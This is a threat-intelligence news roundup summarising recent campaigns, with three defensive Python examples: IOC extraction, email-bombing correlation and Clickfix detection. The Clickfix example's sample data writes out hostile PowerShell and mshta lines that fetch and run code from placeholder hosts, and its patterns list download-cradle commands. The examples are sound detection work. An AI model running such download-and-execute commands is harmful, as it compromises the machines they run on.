Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine | Microsoft Security Blog
Microsoft Threat Intelligence has reported on the Russian nation-state actor Secret Blizzard, which has been using co-opted tools and infrastructure from other threat actors to conduct espionage activities against targets in Ukraine. The campaigns have involved the deployment of custom malware, including the Tavdig and KazuarV2 backdoors, often facilitated through cybercriminal tools like Amadey bot malware.…
Read More
“Scam Yourself” Attacks Show How Social Engineering is Evolving
Summary: The emergence of “scam yourself” attacks represents a sophisticated evolution of social engineering, where attackers manipulate users into compromising their own security. These attacks exploit routine actions, authority, and urgency, making them particularly dangerous as they blend seamlessly into everyday digital interactions. Understanding the psychological triggers behind these scams is essential for developing effective defenses against them.…
Read More
Four Critical Ivanti CSA Vulnerabilities Exploited, CISA and FBI Urge Mitigation
The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have issued a joint advisory regarding the active exploitation of four critical vulnerabilities in Ivanti Cloud Service Appliances. These include CVE-2024-8963, CVE-2024-9379, CVE-2024-8190, and CVE-2024-9380, which can lead to unauthorized access, remote code execution, and credential theft.…
Read More
PlushDaemon compromises supply chain of Korean VPN service
ESET researchers have uncovered a previously undisclosed APT group, PlushDaemon, linked to China, which executed a supply-chain attack on a South Korean VPN developer in 2023. The attackers replaced the legitimate VPN installer with a malicious version that deployed a sophisticated backdoor known as SlowStepper. This backdoor features a comprehensive toolkit with over 30 components, allowing extensive cyber espionage capabilities.…
Read More
Summary: Microsoft has announced that Windows 11 24H2 has entered the broad deployment phase, making it available to all eligible devices via Windows Update. The update is being rolled out to PCs running Windows 10 22H2 and includes a phased approach for eligible devices. Users can check for the update through their device settings and can pause the installation if needed.…
Read More
Discover Hidden Browsing Threats: Free Risk Assessment for GenAI, Identity, Web, and SaaS Risks
Summary: The rise of GenAI tools and SaaS platforms has significantly increased risks related to data exposure and identity vulnerabilities in the workplace. A new complimentary risk assessment is available to help organizations evaluate their specific browsing environment and identify key risks. This assessment provides actionable insights to enhance security posture and inform decision-making for security and IT teams.…
Read More
Targeted supply chain attack against Chrome browser extensions
This article discusses a supply chain attack on Chrome browser extensions that began in December 2024, in which attackers phished extension developers to gain access to their Chrome Web Store publishing accounts and pushed extension versions carrying malicious code. The breach compromised a number of extensions, putting sensitive user data, including authentication tokens, at risk. Investigations revealed the attackers’ methods and infrastructure, highlighting the ongoing threat posed by extension supply chains.…
Read More
PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack
Summary: A newly identified China-aligned advanced persistent threat (APT) group named PlushDaemon has been linked to a supply chain attack on a South Korean VPN provider, utilizing a sophisticated backdoor known as SlowStepper. This backdoor features a comprehensive toolkit designed for espionage and data collection, indicating the group’s significant operational capabilities since at least 2019.…
Read More
Supercharge Your CTI: AI-Powered IOC Collection with ChatGPT, Inoreader and Google Drive
This article outlines a proof-of-concept for automating the collection and processing of Indicators of Compromise (IOCs) using Inoreader, Google Drive, and OpenAI’s GPT-4. The workflow aims to enhance the efficiency of Cyber Threat Intelligence (CTI), Incident Response (IR), and Security Operations Center (SOC) teams by transforming raw data into actionable insights.…
Read More
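The deterministic half of that workflow, pulling indicators out of feed text and normalising them before any model sees them, needs no LLM at all, and doing it first keeps the model from inventing indicators that were never in the article. The following is an added example written for this page, not code from the proof-of-concept the article describes; the article body, hostnames, hashes and addresses in it are constructed placeholders (documentation IP ranges, reserved example domains, the well-known empty-input hashes):

```python
import ipaddress
import json
import re
from urllib.parse import urlparse

# Constructed sample: one article body as a feed reader would hand it over.
SAMPLE_ARTICLE = """
The loader beacons to hxxp://update-check[.]example[.]net/gate.php and, as a fallback,
to 203[.]0[.]113[.]45 on port 8080 and the bare domain mal-cdn[.]example[.]org.
A second stage was fetched from https://cdn.example.org/x.bin (SHA-256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855). Report abuse to
abuse[at]example[.]com. The dropper's MD5 was d41d8cd98f00b204e9800998ecf8427e; the
operators also probed 10.0.0.1 and 127.0.0.1 inside the victim network.
"""

PATTERNS = {
    "url": re.compile(r"\bhttps?://[^\s'\"<>()]+", re.I),
    "email": re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "sha256": re.compile(r"\b[a-f0-9]{64}\b", re.I),
    "sha1": re.compile(r"\b[a-f0-9]{40}\b", re.I),
    "md5": re.compile(r"\b[a-f0-9]{32}\b", re.I),
}

# Addresses that are never useful as network indicators. Documentation ranges such as
# 203.0.113.0/24 are deliberately NOT listed so the constructed sample survives.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def refang(text):
    """Undo the defanging conventions analysts use in write-ups ([.] [at] [:] hxxp)."""
    text = re.sub(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]", ".", text, flags=re.I)
    text = re.sub(r"\[at\]", "@", text, flags=re.I)
    text = re.sub(r"\[:\]", ":", text)
    text = re.sub(r"\bhxxp(s?)://", r"http\1://", text, flags=re.I)
    return text


def extract_iocs(text):
    """Return {kind: sorted unique indicators} for the text, with noise filtered out."""
    clean = refang(text)
    found = {kind: set() for kind in PATTERNS}
    for url in PATTERNS["url"].findall(clean):
        url = url.rstrip(".,;")
        found["url"].add(url)
        host = urlparse(url).hostname
        if host:
            found["domain"].add(host.lower())
    # Blank out URLs and e-mail addresses so their pieces are not re-matched as bare domains.
    remaining = PATTERNS["url"].sub(" ", clean)
    found["email"].update(e.lower() for e in PATTERNS["email"].findall(remaining))
    remaining = PATTERNS["email"].sub(" ", remaining)
    found["domain"].update(d.lower() for d in PATTERNS["domain"].findall(remaining))
    for ip in PATTERNS["ipv4"].findall(remaining):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:  # e.g. 999.1.1.1 passes the regex but is not an address
            continue
        if not any(addr in net for net in NON_ROUTABLE):
            found["ipv4"].add(ip)
    for kind in ("sha256", "sha1", "md5"):
        found[kind].update(h.lower() for h in PATTERNS[kind].findall(remaining))
    return {kind: sorted(values) for kind, values in found.items()}


if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_ARTICLE), indent=2))
```

The output is a plain JSON dictionary that can be dropped into Google Drive or handed to the model purely for enrichment and summarisation, so the model never has to find indicators itself. Before using this in production, add a TLD allowlist to the bare-domain pass and an exclusion list for your own domains, both of which the example omits.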
Critical Mozilla Vulnerabilities Prompt Urgent Updates for Firefox and Thunderbird Users
Mozilla Firefox and Thunderbird users are facing high-severity vulnerabilities that could result in arbitrary code execution and system instability. The Indian Computer Emergency Response Team (CERT-In) has issued an advisory urging immediate software updates to mitigate these risks.
Affected: Mozilla Firefox, Mozilla Thunderbird
Keypoints:
High-severity vulnerabilities found in Mozilla Firefox and Thunderbird.…
Read More
Microsoft previews Game Assist in-game browser in Edge Stable
Summary: Microsoft has launched Game Assist, a new in-game browser feature for Edge Stable users, designed to enhance the gaming experience by providing tips and guides while playing. This overlay can be accessed through the Game Bar and is optimized for various popular games. The feature is now available without needing to switch from the default Edge browser, making it more accessible for gamers.…
Read More
Fake Homebrew Google ads target Mac users with malware
Summary: Hackers are using Google ads to steer Mac and Linux users to a counterfeit Homebrew website that distributes an infostealer known as AmosStealer (Atomic Stealer). This malware is designed to extract sensitive information, including credentials and cryptocurrency wallets. Security experts warn users to be cautious of sponsored ads and to verify the legitimacy of websites before downloading software.…
Read More
Sophos MDR tracks two ransomware campaigns using “email bombing,” Microsoft Teams “vishing”
Sophos X-Ops’ Managed Detection and Response (MDR) has reported on two active threat clusters, STAC5143 and STAC5777, that abuse Microsoft Office 365 to infiltrate organizations for data theft and ransomware deployment. The tactics include email-bombing the target, posing as tech support over Microsoft Teams calls, and abusing legitimate remote-control tools. Both clusters exhibit overlapping techniques with known threat groups like FIN7 and Storm-1811.…
Read More
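The two tactics the summary lists chain together: the email bomb creates the pretext, then the Teams call from an external tenant offers the "fix". Both stages leave telemetry that can be correlated. The following is an added example written for this page, not Sophos code; the mail-gateway and Teams audit records are constructed, the tenant domain corp.example and the thresholds are assumptions, and the field layout is a simplification of what a real gateway or Microsoft 365 audit log exports:

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

INTERNAL_DOMAIN = "corp.example"  # assumed tenant domain for the constructed data


def build_sample_mail_log():
    """Constructed mail-gateway records: (received_at, recipient, sender_domain, subject)."""
    base = datetime(2025, 1, 21, 9, 0, 0)
    rows = []
    # Victim: 60 subscription confirmations from 60 different senders within 10 minutes.
    for i in range(60):
        rows.append((base + timedelta(seconds=10 * i), f"alice@{INTERNAL_DOMAIN}",
                     f"news{i:02d}.example", "Please confirm your subscription"))
    # Colleague: ordinary traffic, a handful of messages spread over an hour.
    for i in range(5):
        rows.append((base + timedelta(minutes=12 * i), f"bob@{INTERNAL_DOMAIN}",
                     "partner.example", f"Re: invoice {i}"))
    return sorted(rows)


def build_sample_teams_log():
    """Constructed Teams audit records: (timestamp, internal_user, peer_domain, activity)."""
    base = datetime(2025, 1, 21, 9, 0, 0)
    return [
        (base + timedelta(minutes=25), f"alice@{INTERNAL_DOMAIN}", "it-helpdesk-support.example", "call"),
        (base + timedelta(minutes=30), f"bob@{INTERNAL_DOMAIN}", "partner.example", "chat"),
        (base + timedelta(minutes=40), f"alice@{INTERNAL_DOMAIN}", INTERNAL_DOMAIN, "chat"),
    ]


def detect_email_bombing(rows, window=timedelta(minutes=10), min_messages=40, min_distinct_senders=20):
    """Sliding-window burst detector per recipient. The distinct-sender floor separates a
    bombing run (hundreds of unrelated newsletters) from one chatty sender. One alert per recipient."""
    recent = defaultdict(deque)
    alerts, alerted = [], set()
    for received_at, recipient, sender_domain, _subject in sorted(rows):
        q = recent[recipient]
        q.append((received_at, sender_domain))
        while received_at - q[0][0] > window:
            q.popleft()
        distinct = len({s for _, s in q})
        if len(q) >= min_messages and distinct >= min_distinct_senders and recipient not in alerted:
            alerted.add(recipient)
            alerts.append({"recipient": recipient, "window_start": q[0][0], "window_end": received_at,
                           "messages": len(q), "distinct_senders": distinct})
    return alerts


def correlate_teams_contact(alerts, teams_rows, lookahead=timedelta(hours=2)):
    """Escalate when an external tenant calls or chats a user shortly after they were bombed."""
    incidents = []
    for alert in alerts:
        for ts, user, peer_domain, activity in teams_rows:
            if (user == alert["recipient"] and peer_domain != INTERNAL_DOMAIN
                    and activity in ("call", "chat")
                    and alert["window_end"] <= ts <= alert["window_end"] + lookahead):
                incidents.append({"user": user, "bomb_ended": alert["window_end"],
                                  "external_contact": ts, "peer_domain": peer_domain,
                                  "activity": activity})
    return incidents


if __name__ == "__main__":
    bombs = detect_email_bombing(build_sample_mail_log())
    for incident in correlate_teams_contact(bombs, build_sample_teams_log()):
        print(incident)
```

The email-bomb alert on its own is only a nuisance-level event; the correlated incident (external tenant contacting a bombed user) is what should page an analyst, and it is also the point at which restricting external Teams access for that user buys time.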
InvisibleFerret Malware: Technical Analysis
The article discusses the emergence of InvisibleFerret malware, which is being spread through fake job interviews targeting developers in the tech and cryptocurrency sectors. This malware is part of a broader campaign that includes other malware like BeaverTail. InvisibleFerret is designed to steal sensitive information and operates silently, making it difficult to detect.…
Read More
Analysis Report on the Latest Phishing Incident by Clickfix: The Tragedy of CAPTCHA Resistance – Security Cow
This article analyzes the Clickfix phishing incidents, highlighting the evolution of CAPTCHA-themed lures and the exploitation of user trust in verification mechanisms. It details how attackers use social engineering to manipulate users into executing malicious commands themselves, leading to data theft.
Affected: Windows system users, WordPress websites, online security sector
Keypoints:
Clickfix is a phishing technique that exploits user fatigue with verification processes.…
Read More
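Because the victim types or pastes the command, the endpoint telemetry looks different from a dropper: the script host is a child of explorer.exe (the Run dialog), the command line contains a download-and-execute cradle, and it usually ends in a comment that shows "verification" text in the Run box. The following detection logic over process-creation events is an added example written for this page, not code from the article; the events, image paths and lure domains are constructed, and treating explorer.exe as the only interactive launcher is an assumption:

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """The three fields this check needs from a process-creation record (Sysmon event ID 1
    or equivalent EDR telemetry). Constructed for the example."""
    parent_image: str
    image: str
    command_line: str


# Win+R launches go through explorer.exe; assumption: it is the only interactive launcher modelled.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

DOWNLOAD_CRADLE = re.compile(
    r"\biex\b|invoke-expression|\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest"
    r"|downloadstring|\bmshta\b.*https?://|\bcurl\s|certutil\s+-urlcache|bitsadmin\s+/transfer",
    re.I)
EVASION_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# The pasted command usually carries a trailing comment so the Run box shows lure text, not code.
LURE_COMMENT = re.compile(r"#.*(?:i am not a robot|captcha|verification id|human verification)", re.I)


def tag_event(ev):
    """Return the set of behavioural tags an event exhibits."""
    tags = set()
    parent = ntpath.basename(ev.parent_image).lower()
    child = ntpath.basename(ev.image).lower()
    if parent in INTERACTIVE_PARENTS and child in SCRIPT_HOSTS:
        tags.add("interactive_script_host")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        tags.add("download_cradle")
    if EVASION_FLAGS.search(ev.command_line):
        tags.add("evasion_flags")
    if LURE_COMMENT.search(ev.command_line):
        tags.add("verification_lure")
    return tags


def is_clickfix(ev):
    """Alert when a user-launched script host fetches remote code or carries the lure text.
    Evasion flags alone are noisy (admin scripts use them) and only add context."""
    tags = tag_event(ev)
    alert = "interactive_script_host" in tags and bool(tags & {"download_cradle", "verification_lure"})
    return alert, tags


# Constructed events: two Clickfix-style launches, then three benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -ep bypass -c "iex (irm https://captcha-check.example/verify.ps1)" '
                 '# I am not a robot - reCAPTCHA Verification ID: 8812'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://lure.example/go.mp4"),
    ProcessEvent(r"C:\Program Files\Microsoft VS Code\Code.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Process"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]


def triage(events):
    """(alert, sorted tags) for each event, in input order."""
    results = []
    for ev in events:
        alert, tags = is_clickfix(ev)
        results.append((alert, sorted(tags)))
    return results


if __name__ == "__main__":
    for ev, (alert, tags) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print("ALERT " if alert else "      ", ntpath.basename(ev.image), tags)
```

The same signals map onto Sysmon or EDR queries directly (ParentImage ends with explorer.exe, Image in the script-host set, CommandLine matching the cradle or lure patterns); a RunMRU registry write immediately preceding the process start is a further corroborating artifact that this example does not model.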
Star Blizzard hackers abuse WhatsApp to target high-value diplomats
Summary: Russian nation-state actor Star Blizzard has initiated a spear-phishing campaign targeting the WhatsApp accounts of individuals in government, diplomacy, and organizations related to Ukraine aid. This campaign marks a tactical shift following the exposure of their previous methods: rather than delivering malware, the actor relies on social engineering, sending targets a QR code that, when scanned, links an attacker-controlled device to the victim's WhatsApp account.…
Read More